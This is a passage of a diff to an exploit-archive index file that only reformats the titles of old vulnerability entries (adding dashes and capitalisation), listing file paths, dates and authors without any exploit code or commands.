Vulnerabililty",2003-10-03,"random nut",windows,remote,0 23212,platforms/hardware/remote/23212.txt,"Cisco LEAP Password Disclosure Weakness",2003-10-03,"Cisco Security",hardware,remote,0 @@ -20415,7 +20415,7 @@ id,file,description,date,author,platform,type,port 23215,platforms/windows/dos/23215.html,"Microsoft Internet Explorer 6 Absolute Position Block Denial of Service Vulnerability",2003-10-03,"Nick Johnson",windows,dos,0 23216,platforms/windows/dos/23216.txt,"Microsoft Word 97/98/2002 Malformed Document Denial of Service Vulnerability",2003-10-03,"Bahaa Naamneh",windows,dos,0 23217,platforms/cgi/webapps/23217.txt,"Divine Content Server 5.0 Error Page Cross-Site Scripting Vulnerability",2003-10-03,valgasu,cgi,webapps,0 -23218,platforms/php/webapps/23218.txt,"EternalMart Mailing List Manager 1.32 Remote File Include Vulnerabilities",2003-10-04,frog,php,webapps,0 +23218,platforms/php/webapps/23218.txt,"EternalMart Mailing List Manager 1.32 - Remote File Include Vulnerabilities",2003-10-04,frog,php,webapps,0 23219,platforms/php/webapps/23219.txt,"GuppY 2.4 Cross-Site Scripting Vulnerability",2003-10-05,frog,php,webapps,0 23220,platforms/php/webapps/23220.txt,"GuppY 2.4 - Remote File Access Vulnerability",2003-10-05,frog,php,webapps,0 23221,platforms/multiple/remote/23221.txt,"JBoss 3.0.8/3.2.1 HSQLDB Remote Command Injection Vulnerability",2003-10-06,"Marc Schoenefeld",multiple,remote,0 @@ -20449,7 +20449,7 @@ id,file,description,date,author,platform,type,port 23249,platforms/php/webapps/23249.txt,"MyBB KingChat Plugin - Persistent XSS",2012-12-09,VipVince,php,webapps,0 23250,platforms/hardware/webapps/23250.txt,"Cisco DPC2420 Multiples Vulnerabilities",2012-12-09,"Facundo M. de la Cruz",hardware,webapps,0 23251,platforms/linux/local/23251.txt,"Centrify Deployment Manager 2.1.0.283 - Local Root",2012-12-09,"Larry W. Cashdollar",linux,local,0 -23252,platforms/php/webapps/23252.txt,"ClipBucket 2.6 Revision 738 Multiple SQL Injection Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 +23252,platforms/php/webapps/23252.txt,"ClipBucket 2.6 Revision 738 - Multiple SQL Injection Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23253,platforms/php/webapps/23253.txt,"achievo 1.4.5 - Multiple Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23254,platforms/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 Denial of Service Vulnerability",2012-12-09,"High-Tech Bridge SA",windows,dos,0 23255,platforms/windows/local/23255.cpp,"Microsoft ListBox/ComboBox Control User32.dll Function Buffer Overrun Vulnerability",2003-10-15,"Brett Moore",windows,local,0 @@ -20465,7 +20465,7 @@ id,file,description,date,author,platform,type,port 23265,platforms/windows/remote/23265.txt,"Sun Java Plug-In 1.4.2 _01 Cross-Site Applet Sandbox Security Model Violation Vulnerability",2003-10-20,"Marc Schoenefeld",windows,remote,0 23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart Server Error Message Installation Path Disclosure Vulnerability",2003-10-20,Dr`Ponidi,cgi,webapps,0 23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur Mailserver 3.3/4.0/4.2 IMAP AUTH Remote Buffer Overflow Vulnerability",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0 -23268,platforms/java/webapps/23268.txt,"Vivisimo Clustering Engine 0 Search Script Cross-Site Scripting Vulnerability",2003-10-21,ComSec,java,webapps,0 +23268,platforms/java/webapps/23268.txt,"Vivisimo Clustering Engine - Search Script Cross-Site Scripting Vulnerability",2003-10-21,ComSec,java,webapps,0 23269,platforms/php/webapps/23269.txt,"FuzzyMonkey 2.11 MyClassifieds Email Variable SQL Injection Vulnerability",2003-10-21,Ezhilan,php,webapps,0 23270,platforms/windows/remote/23270.java,"Sun Java Plug-In 1.4 Unauthorized Java Applet Floppy Access Weakness",2003-10-21,"Marc Schoenefeld",windows,remote,0 23271,platforms/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin Cross-Site Scripting Vulnerability",2003-10-22,SecuriTeam,multiple,remote,0 @@ -20476,13 +20476,13 @@ id,file,description,date,author,platform,type,port 23276,platforms/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x Slash Path Security Model Circumvention Vulnerability",2003-10-22,"Last Stage of Delirium",multiple,dos,0 23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 -23282,platforms/multiple/remote/23282.txt,"apache cocoon 2.14/2.2 - Directory Traversal vulnerability",2003-10-24,"Thierry De Leeuw",multiple,remote,0 +23282,platforms/multiple/remote/23282.txt,"apache cocoon 2.14/2.2 - Directory Traversal Vulnerability",2003-10-24,"Thierry De Leeuw",multiple,remote,0 23283,platforms/windows/remote/23283.txt,"Microsoft Internet Explorer 6.0 - Local Resource Reference Vulnerability",2003-10-24,Mindwarper,windows,remote,0 23284,platforms/php/webapps/23284.txt,"MyBB Bank- 3 Plugin - SQL Injection",2012-12-11,Red_Hat,php,webapps,0 23286,platforms/php/webapps/23286.txt,"Joomla JooProperty 1.13.0 - Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0 23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0 23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 IMXCF.DLL Plugin Code Execution",2012-12-11,beford,windows,dos,0 -23289,platforms/php/webapps/23289.txt,"PHP Nuke 8.2.4 CSRF Vulnerability",2012-12-11,sajith,php,webapps,0 +23289,platforms/php/webapps/23289.txt,"PHP Nuke 8.2.4 - CSRF Vulnerability",2012-12-11,sajith,php,webapps,0 23290,platforms/windows/remote/23290.rb,"HP Data Protector DtbClsLogin Buffer Overflow",2012-12-11,metasploit,windows,remote,0 23291,platforms/multiple/remote/23291.txt,"Opera Web Browser 7 IFRAME Zone Restriction Bypass Vulnerability",2003-10-24,Mindwarper,multiple,remote,0 23292,platforms/multiple/dos/23292.java,"Sun Microsystems Java Virtual Machine 1.x Security Manager Denial of Service Vulnerability",2003-10-26,"Marc Schoenefeld",multiple,dos,0 @@ -20519,7 +20519,7 @@ id,file,description,date,author,platform,type,port 23323,platforms/windows/remote/23323.py,"Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability (0day)",2012-12-12,Abysssec,windows,remote,0 23324,platforms/windows/webapps/23324.txt,"Axway Secure Transport 5.1 SP2 Path Traversal Vulnerability",2012-12-12,"Sebastian Perez",windows,webapps,0 23325,platforms/multiple/dos/23325.c,"BRS WebWeaver 1.06 httpd `User-Agent` Remote Denial of Service Vulnerability",2003-11-01,D4rkGr3y,multiple,dos,0 -23326,platforms/asp/webapps/23326.txt,"http commander 4.0 - Directory Traversal vulnerability",2003-11-01,"Zero X",asp,webapps,0 +23326,platforms/asp/webapps/23326.txt,"http commander 4.0 - Directory Traversal Vulnerability",2003-11-01,"Zero X",asp,webapps,0 23327,platforms/windows/local/23327.txt,"DATEV Nutzungskontrolle 2.1/2.2 Unauthorized Access Vulnerability",2003-11-01,t4rku5,windows,local,0 23328,platforms/windows/remote/23328.py,"Nullsoft SHOUTcast 1.9.2 icy-name/icy-url Memory Corruption Vulnerability (1)",2003-11-03,airsupply,windows,remote,0 23329,platforms/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 icy-name/icy-url Memory Corruption Vulnerability (2)",2003-11-03,exworm,windows,remote,0 @@ -20556,17 +20556,17 @@ id,file,description,date,author,platform,type,port 23362,platforms/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3-2.3.9-4 - Blind SQL Injection Exploit",2012-12-13,modpr0be,php,webapps,0 23363,platforms/php/webapps/23363.txt,"phpBB 2.0.x Profile.PHP SQL Injection Vulnerability",2003-11-08,JOCANOR,php,webapps,0 23364,platforms/linux/local/23364.sh,"WMAPM 3.1 Privilege Escalation Vulnerability",2003-11-08,"Knud Erik Hojgaard",linux,local,0 -23365,platforms/windows/remote/23365.txt,"telcondex simplewebserver 2.13.31027 build 3289 - Directory Traversal vulnerability",2003-11-10,nimber@designer.ru,windows,remote,0 +23365,platforms/windows/remote/23365.txt,"telcondex simplewebserver 2.13.31027 build 3289 - Directory Traversal Vulnerability",2003-11-10,nimber@designer.ru,windows,remote,0 23366,platforms/linux/remote/23366.c,"Epic 1.0.1/1.0.x CTCP Nickname Server Message Buffer Overrun Vulnerability",2003-11-10,Li0n7,linux,remote,0 -23367,platforms/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 dose.pl Remote Command Execution Vulnerability",2003-11-10,Don_Huan,cgi,webapps,0 +23367,platforms/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 DoSe.pl Remote Command Execution Vulnerability",2003-11-10,Don_Huan,cgi,webapps,0 23368,platforms/linux/remote/23368.c,"Winace UnAce 2.2 Command Line Argument Buffer Overflow Vulnerability (1)",2003-11-10,demz,linux,remote,0 23369,platforms/linux/remote/23369.c,"Winace UnAce 2.2 Command Line Argument Buffer Overflow Vulnerability (2)",2003-11-10,Li0n7,linux,remote,0 -23370,platforms/cgi/webapps/23370.txt,"ncube server manager 1.0 - Directory Traversal vulnerability",2003-11-10,"Beck Mr.R",cgi,webapps,0 +23370,platforms/cgi/webapps/23370.txt,"ncube server manager 1.0 - Directory Traversal Vulnerability",2003-11-10,"Beck Mr.R",cgi,webapps,0 23371,platforms/linux/remote/23371.c,"Hylafax 4.1.x HFaxD Unspecified Format String Vulnerability",2003-11-10,"Sebastian Krahmer",linux,remote,0 23372,platforms/php/webapps/23372.txt,"PHP-Coolfile 1.4 Unauthorized Administrative Access Vulnerability",2003-11-11,r00t@rsteam.ru,php,webapps,0 23373,platforms/windows/remote/23373.html,"Opera Web Browser 7.x URI Handler Directory Traversal Vulnerability",2003-11-12,S.G.Masood,windows,remote,0 23374,platforms/windows/dos/23374.pl,"Qualcomm Eudora 5.x/6.0 Spoofed Attachment Line Denial of Service Vulnerability",2003-11-12,"Paul Szabo",windows,dos,0 -23375,platforms/linux/dos/23375.txt,"GNU Zebra 0.9x / Quagga 0.96 Remote Denial of Service Vulnerability",2003-11-12,"Jonny Robertson",linux,dos,0 +23375,platforms/linux/dos/23375.txt,"GNU Zebra 0.9x / Quagga 0.96 - Remote Denial of Service Vulnerability",2003-11-12,"Jonny Robertson",linux,dos,0 23376,platforms/hardware/remote/23376.txt,"FortiGate Firewall 2.x dlg Admin Interface XSS",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 23377,platforms/hardware/remote/23377.txt,"FortiGate Firewall 2.x Policy Admin Interface XSS",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 23378,platforms/hardware/remote/23378.txt,"FortiGate Firewall 2.x listdel Admin Interface XSS",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 @@ -20577,7 +20577,7 @@ id,file,description,date,author,platform,type,port 23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 $path Remote File Include Vulnerability",2003-11-17,"RusH security team",php,webapps,0 23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service Cross-Site Scripting Vulnerability",2003-11-17,"Ziv Kamir",multiple,remote,0 23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 Cross-Site Scripting Vulnerability",2003-11-17,"David Sopas Ferreira",php,webapps,0 -23387,platforms/windows/remote/23387.txt,"netserve web server 1.0.7 - Directory Traversal vulnerability",2003-11-17,nimber@designer.ru,windows,remote,0 +23387,platforms/windows/remote/23387.txt,"netserve web server 1.0.7 - Directory Traversal Vulnerability",2003-11-17,nimber@designer.ru,windows,remote,0 23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0 23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl Local Denial of Service Vulnerability",2003-11-19,anonymous,openbsd,dos,0 23390,platforms/multiple/dos/23390.txt,"EffectOffice Server 2.6 - Remote Service Buffer Overflow Vulnerability",2003-11-20,D_BuG,multiple,dos,0 @@ -20606,7 +20606,7 @@ id,file,description,date,author,platform,type,port 23413,platforms/linux/remote/23413.c,"PLD Software Ebola 0.1.4 - Buffer Overflow Vulnerability",2003-12-05,c0wboy,linux,remote,0 23414,platforms/linux/local/23414.txt,"FVWM 2.4/2.5 fvwm-menu-directory Command Execution Vulnerability",2003-12-05,auto22238,linux,local,0 23415,platforms/asp/webapps/23415.txt,"Virtual Programming VP-ASP 4/5 shopdisplayproducts.asp Cross-Site Scripting Vulnerability",2003-12-05,"Xnuxer Research",asp,webapps,0 -23416,platforms/php/webapps/23416.txt,"Xoops 1.3.x/2.0.x Multiple Vulnerabilities",2003-12-06,frog,php,webapps,0 +23416,platforms/php/webapps/23416.txt,"Xoops 1.3.x/2.0.x - Multiple Vulnerabilities",2003-12-06,frog,php,webapps,0 23417,platforms/windows/remote/23417.c,"EZMeeting 3.x EZNet.EXE Long HTTP Request Remote Buffer Overflow Vulnerability",2003-12-08,kralor,windows,remote,0 23418,platforms/cgi/webapps/23418.pl,"Webgate WebEye Information Disclosure Vulnerability",2003-12-08,datapath,cgi,webapps,0 23419,platforms/windows/remote/23419.txt,"Abyss Web Server 1.0/1.1 Authentication Bypass Vulnerability",2003-12-08,"Luigi Auriemma",windows,remote,0 @@ -20629,7 +20629,7 @@ id,file,description,date,author,platform,type,port 23438,platforms/linux/dos/23438.pl,"X-Chat 2.0.6 - Remote Denial of Service Vulnerability",2003-12-15,"Stefan Hecker",linux,dos,0 23439,platforms/multiple/remote/23439.txt,"MVDSV 0.165 b/0.171 Quake Server Download Buffer Overrun Vulnerability",2003-12-15,"Oscar Linderholm",multiple,remote,0 23440,platforms/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,asp,webapps,0 -23441,platforms/linux/remote/23441.c,"Cyrus IMSP Daemon 1.x Remote Buffer Overflow Vulnerability",2003-12-15,"Carlos Barros",linux,remote,0 +23441,platforms/linux/remote/23441.c,"Cyrus IMSP Daemon 1.x - Remote Buffer Overflow Vulnerability",2003-12-15,"Carlos Barros",linux,remote,0 23442,platforms/osx/dos/23442.txt,"MacOSX 10 CD9660.Util Probe For Mounting Argument Local Buffer Overflow Vulnerability",2003-12-15,Max,osx,dos,0 23443,platforms/php/webapps/23443.txt,"Aardvark Topsites 4.1 PHP Multiple Vulnerabilities",2003-12-16,JeiAr,php,webapps,0 23444,platforms/multiple/dos/23444.pl,"SX Design sipd 0.1.2/0.1.4 - Remote Format String Vulnerability",2003-12-16,storm,multiple,dos,0 @@ -20649,7 +20649,7 @@ id,file,description,date,author,platform,type,port 23458,platforms/php/webapps/23458.txt,"BES-CMS 0.4/0.5 hacking.php File Include Vulnerability",2003-12-20,frog,php,webapps,0 23459,platforms/php/webapps/23459.txt,"Xoops 2.0.5 .1 MyLinks Myheader.php Cross-Site Scripting Vulnerability",2003-12-21,"Chintan Trivedi",php,webapps,0 23460,platforms/php/webapps/23460.pl,"ProjectForum 8.4.2 .1 find Request Denial of Service Vulnerability",2003-12-22,"Peter Winter-Smith",php,webapps,0 -23461,platforms/windows/remote/23461.txt,"dcam webcam server personal web server 8.2.5 - Directory Traversal vulnerability",2003-12-22,"Luigi Auriemma",windows,remote,0 +23461,platforms/windows/remote/23461.txt,"dcam webcam server personal web server 8.2.5 - Directory Traversal Vulnerability",2003-12-22,"Luigi Auriemma",windows,remote,0 23462,platforms/php/webapps/23462.txt,"osCommerce 2.2 products_id URI Parameter SQL Injection Vulnerability",2003-12-22,JeiAr,php,webapps,0 23463,platforms/php/webapps/23463.txt,"osCommerce 2.2 manufacturers_id Parameter Cross-Site Scripting Vulnerability",2003-12-22,JeiAr,php,webapps,0 23464,platforms/windows/remote/23464.pl,"Opera 7.x Relative Path Directory Traversal File Corruption Vulnerability",2003-11-15,nesumin,windows,remote,0 @@ -20699,12 +20699,12 @@ id,file,description,date,author,platform,type,port 23512,platforms/windows/dos/23512.txt,"Surfnet 1.31 CMD_CREDITCARD_CHARGE Denial of Service Vulnerability",2004-01-02,Rift_XT,windows,dos,0 23513,platforms/php/webapps/23513.txt,"Athena Web Registration Remote Command Execution Vulnerability",2004-01-02,"Peter Kieser",php,webapps,0 23514,platforms/windows/remote/23514.pl,"Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server Buffer Overflow Vulnerability",2004-01-04,"Peter Winter-Smith",windows,remote,0 -23515,platforms/asp/webapps/23515.txt,"ASPApp PortalAPP 0 Remote User Database Access Vulnerability",2004-01-04,newbie6290,asp,webapps,0 +23515,platforms/asp/webapps/23515.txt,"ASPApp PortalAPP - Remote User Database Access Vulnerability",2004-01-04,newbie6290,asp,webapps,0 23516,platforms/asp/webapps/23516.txt,"ASP-Nuke 1.0/1.2/1.3 - Remote User Database Access Vulnerability",2004-01-04,"Vietnamese Security Group",asp,webapps,0 23517,platforms/php/webapps/23517.txt,"HotNews 0.x hotnews-engine.inc.php3 config[header] Parameter Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 23518,platforms/php/webapps/23518.txt,"HotNews 0.x config[incdir] Parameter Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 23519,platforms/php/webapps/23519.txt,"FreznoShop 1.2.3/1.3 Search Script Cross-Site Scripting Vulnerability",2004-01-04,"David S. Ferreira",php,webapps,0 -23520,platforms/php/webapps/23520.txt,"PhpGedView 2.61 Multiple PHP Remote File Include Vulnerabilities",2004-01-06,Windak,php,webapps,0 +23520,platforms/php/webapps/23520.txt,"PhpGedView 2.61 - Multiple PHP Remote File Include Vulnerabilities",2004-01-06,Windak,php,webapps,0 23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP Authenticated Admin Command Injection",2012-12-20,"Spencer McIntyre",multiple,remote,0 23523,platforms/linux/dos/23523.c,"gdb (GNU debugger) <= 7.5.1NULL Pointer Dereference",2012-12-20,nitr0us,linux,dos,0 23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 Crash PoC",2012-12-20,nitr0us,multiple,dos,0 @@ -20727,7 +20727,7 @@ id,file,description,date,author,platform,type,port 23541,platforms/multiple/remote/23541.c,"lionmax software www file share pro 2.4x Multiple Vulnerabilities (1)",2004-01-14,"Luigi Auriemma",multiple,remote,0 23542,platforms/multiple/remote/23542.c,"lionmax software www file share pro 2.4x Multiple Vulnerabilities (2)",2004-01-14,"Luigi Auriemma",multiple,remote,0 23543,platforms/multiple/dos/23543.txt,"Vicomsoft RapidCache Server 2.0/2.2.6 Host Argument Denial of Service Vulnerability",2004-01-15,"Peter Winter-Smith",multiple,dos,0 -23544,platforms/windows/remote/23544.txt,"vicomsoft rapidcache server 2.0/2.2.6 - Directory Traversal vulnerability",2004-01-15,"Peter Winter-Smith",windows,remote,0 +23544,platforms/windows/remote/23544.txt,"vicomsoft rapidcache server 2.0/2.2.6 - Directory Traversal Vulnerability",2004-01-15,"Peter Winter-Smith",windows,remote,0 23545,platforms/hardware/remote/23545.txt,"Whale Communications e-Gap Security Appliance 2.5 Login Page Source Code Disclosure Vulnerability",2004-01-15,Procheckup,hardware,remote,0 23546,platforms/php/webapps/23546.txt,"phpShop Web Shopping Cart 0.6.1 -b Multiple Function XSS",2004-01-16,JeiAr,php,webapps,0 23547,platforms/asp/webapps/23547.txt,"XtremeASP PhotoGallery 2.0 Adminlogin.ASP SQL Injection Vulnerability",2004-01-16,posidron,asp,webapps,0 @@ -20738,12 +20738,12 @@ id,file,description,date,author,platform,type,port 23552,platforms/windows/remote/23552.xml,"Sun J2EE/RI 1.4,Sun JDK 1.4.2 JDBC Database Insecure Default Policy Vulnerabilities",2004-01-19,"Marc Schoenefeld",windows,remote,0 23553,platforms/php/webapps/23553.php,"Mambo Open Source 4.5/4.6 mod_mainmenu.php Remote File Include Vulnerability",2004-01-19,Yo_Soy,php,webapps,0 23554,platforms/php/webapps/23554.java,"YABB SE 1.x SSI.PHP ID_MEMBER SQL Injection Vulnerability",2004-01-19,BaCkSpAcE,php,webapps,0 -23555,platforms/windows/remote/23555.txt,"GoAhead WebServer 2.1.x Directory Management Policy Bypass Vulnerability",2004-01-19,"Luigi Auriemma",windows,remote,0 +23555,platforms/windows/remote/23555.txt,"GoAhead WebServer 2.1.x - Directory Management Policy Bypass Vulnerability",2004-01-19,"Luigi Auriemma",windows,remote,0 23556,platforms/multiple/dos/23556.txt,"GetWare Web Server Component Content-Length Value Remote Denial of Service Vulnerability",2004-01-19,"Luigi Auriemma",multiple,dos,0 -23557,platforms/multiple/remote/23557.txt,"aiptek netcam webserver 0.93.15 - Directory Traversal vulnerability",2004-01-20,"Rafel Ivgi The-Insider",multiple,remote,0 +23557,platforms/multiple/remote/23557.txt,"aiptek netcam webserver 0.93.15 - Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",multiple,remote,0 23558,platforms/php/webapps/23558.txt,"PHPix 2.0.3 - Remote Arbitrary Command Execution Vulnerability",2004-01-20,"Max Stepanov",php,webapps,0 23559,platforms/windows/remote/23559.txt,"WebTrends Reporting Center 6.1 Management Interface Path Disclosure Vulnerability",2004-01-20,"Oliver Karow",windows,remote,0 -23560,platforms/windows/remote/23560.txt,"anteco visual technologies ownserver 1.0 - Directory Traversal vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 +23560,platforms/windows/remote/23560.txt,"anteco visual technologies ownserver 1.0 - Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 23561,platforms/asp/webapps/23561.txt,"DUware Software Multiple Vulnerabilities",2004-01-20,"Security Corporation",asp,webapps,0 23562,platforms/windows/remote/23562.html,"2Wire HomePortal Series - Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 23563,platforms/multiple/remote/23563.txt,"Darkwet Network WebcamXP 1.6.945 Cross-Site Scripting Vulnerability",2004-01-21,"Rafel Ivgi The-Insider",multiple,remote,0 @@ -20756,7 +20756,7 @@ id,file,description,date,author,platform,type,port 23572,platforms/hardware/webapps/23572.txt,"YeaLink IP Phone SIP-TxxP firmware <= 9.70.0.100 - Multiple Vulnerabilities",2012-12-21,xistence,hardware,webapps,0 23573,platforms/php/webapps/23573.txt,"banana dance b.2.6 - Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 NULL Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0 -23575,platforms/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 Multiple SQL Injection Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 +23575,platforms/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 - Multiple SQL Injection Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23579,platforms/unix/remote/23579.rb,"TWiki MAKETEXT Remote Command Execution",2012-12-23,metasploit,unix,remote,0 23580,platforms/unix/remote/23580.rb,"Foswiki MAKETEXT Remote Command Execution",2012-12-23,metasploit,unix,remote,0 23581,platforms/linux/local/23581.pl,"Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability",2004-01-21,"Steve Grubb",linux,local,0 @@ -20775,24 +20775,24 @@ id,file,description,date,author,platform,type,port 23594,platforms/windows/remote/23594.txt,"tinyserver 1.1 - Directory Traversal",2004-01-24,"Donato Ferrante",windows,remote,0 23595,platforms/windows/dos/23595.txt,"TinyServer 1.1 - Denial of Service",2004-01-24,"Donato Ferrante",windows,dos,0 23596,platforms/windows/remote/23596.txt,"TinyServer 1.1 Cross-site scripting",2004-01-24,"Donato Ferrante",windows,remote,0 -23597,platforms/windows/remote/23597.txt,"borland web server for corel paradox 1.0 b3 - Directory Traversal vulnerability",2004-01-24,"Rafel Ivgi The-Insider",windows,remote,0 +23597,platforms/windows/remote/23597.txt,"borland web server for corel paradox 1.0 b3 - Directory Traversal Vulnerability",2004-01-24,"Rafel Ivgi The-Insider",windows,remote,0 23598,platforms/multiple/remote/23598.txt,"IBM Net.Data 7.0/7.2 db2www Error Message Cross-Site Scripting Vulnerability",2004-01-26,"Carsten Eiram",multiple,remote,0 23599,platforms/php/webapps/23599.txt,"Gallery 1.3.x/1.4 - Remote Global Variable Injection Vulnerability",2004-01-26,"Bharat Mediratta",php,webapps,0 23600,platforms/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 Cross-Site Scripting Vulnerability",2004-01-26,"Donato Ferrante",multiple,remote,0 23601,platforms/multiple/remote/23601.rb,"Netwin SurgeFTP Remote Command Execution",2012-12-23,metasploit,multiple,remote,0 23602,platforms/windows/dos/23602.txt,"mIRC 6.1 DCC Get Dialog Denial of Service Vulnerability",2004-01-26,"MASTER VIPER",windows,dos,0 -23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal vulnerability",2004-01-26,"Donato Ferrante",windows,remote,0 +23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal Vulnerability",2004-01-26,"Donato Ferrante",windows,remote,0 23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface NDCR Parameter Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0 23605,platforms/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x Error Page Cross Site Scripting Vulnerability",2004-01-26,"César Fernández",solaris,remote,0 23606,platforms/php/webapps/23606.txt,"Xoops 2.0.x Viewtopic.php Cross-Site Scripting Vulnerability",2004-01-26,"Ben Drysdale",php,webapps,0 23607,platforms/php/webapps/23607.txt,"Kietu 2/3 Index.PHP Remote File Include Vulnerability",2004-01-26,"Himeur Nourredine",php,webapps,0 -23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 Multiple Stack and Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0 -23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0 -23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0 +23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0 +23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0 +23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0 23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench Weak Encryption Algorithm Vulnerability",2004-01-28,"Pete Finnigan",multiple,local,0 23612,platforms/windows/remote/23612.txt,"BRS WebWeaver 1.0.7 ISAPISkeleton.dll Cross-Site Scripting Vulnerability",2004-01-28,"Oliver Karow",windows,remote,0 23613,platforms/cgi/webapps/23613.txt,"Leif M. Wright Web Blog 1.1 File Disclosure Vulnerability",2004-01-20,"Zone-h Security Team",cgi,webapps,0 -23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x Remote HTTP GET Request Denial of Service Vulnerability",2004-01-28,"Donato Ferrante",windows,dos,0 +23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service Vulnerability",2004-01-28,"Donato Ferrante",windows,dos,0 23615,platforms/cgi/webapps/23615.txt,"PJ CGI Neo Review Directory Traversal Vulnerability",2004-01-29,"Zone-h Security Team",cgi,webapps,0 23616,platforms/php/webapps/23616.txt,"PhpGedView 2.x Editconfig_gedcom.php Directory Traversal Vulnerability",2004-01-30,"Cedric Cochin",php,webapps,0 23617,platforms/php/webapps/23617.txt,"PhpGedView 2.x [GED_File]_conf.php Remote File Include Vulnerability",2004-01-30,"Cedric Cochin",php,webapps,0 @@ -20807,7 +20807,7 @@ id,file,description,date,author,platform,type,port 23628,platforms/php/webapps/23628.txt,"JBrowser 1.0/2.x Unauthorized Admin Access Vulnerability",2004-01-30,"Himeur Nourredine",php,webapps,0 23629,platforms/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 - Remote Command Execution Vulnerability",2004-01-31,ActualMInd,cgi,webapps,0 23630,platforms/php/webapps/23630.txt,"Aprox Portal 3.0 File Disclosure Vulnerability",2004-01-31,"Zero X",php,webapps,0 -23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x Multiple Module SQL Injection Vulnerabilities",2004-02-02,"Security Corporation",php,webapps,0 +23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x - Multiple Module SQL Injection Vulnerabilities",2004-02-02,"Security Corporation",php,webapps,0 23632,platforms/windows/remote/23632.txt,"Crob FTP Server 3.5.1 - Remote Information Disclosure Vulnerability",2004-02-02,"Zero X",windows,remote,0 23633,platforms/windows/dos/23633.txt,"Crob FTP Server 3.5.1 - Denial of Service Vulnerability",2004-02-02,"Zero X",windows,dos,0 23634,platforms/linux/local/23634.c,"0verkill 0.16 Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,linux,local,0 @@ -20815,7 +20815,7 @@ 